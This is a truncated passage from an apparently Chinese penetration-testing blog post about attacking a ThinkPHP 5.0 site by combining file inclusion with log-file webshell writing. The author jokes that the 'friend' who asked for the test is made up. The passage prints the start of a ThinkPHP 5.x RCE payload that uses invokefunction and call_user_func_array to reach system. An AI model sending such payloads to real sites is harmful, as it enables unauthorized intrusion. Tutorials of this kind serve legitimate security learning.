滲透測試實戰-文件包含和日誌文件寫入木馬混合利用

1.起因 我有一個朋友,讓我幫忙測試一下他的站,於是有了這篇文章。(無中生友篇) 2.信息收集 訪問首頁一下先,看到是thinkphp v5.0版本。   然後谷歌大法,直接上TP 5.X RCE的EXP,一頓騷操作: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=w
相關文章
相關標籤/搜索